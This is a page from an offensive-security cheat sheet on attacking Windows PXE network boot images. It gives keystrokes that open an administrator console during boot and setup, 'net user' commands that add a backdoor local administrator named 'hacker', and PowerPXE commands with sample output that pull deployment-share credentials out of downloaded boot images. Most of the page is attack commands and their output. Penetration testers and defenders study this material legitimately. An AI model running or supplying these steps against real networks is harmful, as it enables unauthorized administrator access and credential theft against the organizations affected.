internal-pxe-boot-image.md (2775B)
1 --- 2 title: "Internal - PXE Boot Image" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/internal-pxe-boot-image.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-pxe-boot-image.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Internal - PXE Boot Image 12 13 PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. 14 15 - Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine. 16 - Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry. 17 18 ```powershell 19 net user hacker Password123! /add 20 net localgroup administrators /add hacker 21 ``` 22 23 - Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts. 24 25 ```powershell 26 # Import the module 27 PS > Import-Module .\PowerPXE.ps1 28 29 # Start the exploit on the Ethernet interface 30 PS > Get-PXEcreds -InterfaceAlias Ethernet 31 PS > Get-PXECreds -InterfaceAlias « lab 0 » 32 33 # Wait for the DHCP to get an address 34 >> Get a valid IP address 35 >>> >>> DHCP proposal IP address: 192.168.22.101 36 >>> >>> DHCP Validation: DHCPACK 37 >>> >>> IP address configured: 192.168.22.101 38 39 # Extract BCD path from the DHCP response 40 >> Request BCD File path 41 >>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd 42 >>> >>> TFTP IP Address: 192.168.22.3 43 44 # Download the BCD file and extract wim files 45 >> Launch TFTP download 46 >>>> Transfer succeeded. 47 >> Parse the BCD file: conf.bcd 48 >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim 49 >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim 50 >> Launch TFTP download 51 >>>> Transfer succeeded. 52 53 # Parse wim files to find interesting data 54 >> Open LiteTouchPE_x86.wim 55 >>>> Finding Bootstrap.ini 56 >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$ 57 >>>> >>>> UserID = MdtService 58 >>>> >>>> UserPassword = Somepass1 59 ``` 60 61 ## References 62 63 - [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/) 64 - [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE)